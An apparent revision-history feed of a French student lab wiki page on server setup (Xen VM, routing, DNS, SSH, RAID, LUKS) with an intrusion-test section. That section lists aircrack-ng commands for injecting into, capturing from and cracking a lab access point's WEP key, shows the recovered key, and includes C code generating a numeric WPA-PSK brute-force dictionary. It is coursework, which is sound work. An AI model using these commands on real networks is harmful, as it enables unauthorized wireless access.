&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54097</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54097"/>
				<updated>2020-11-30T15:33:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54094</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54094"/>
				<updated>2020-11-30T15:32:52Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Réalisations */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
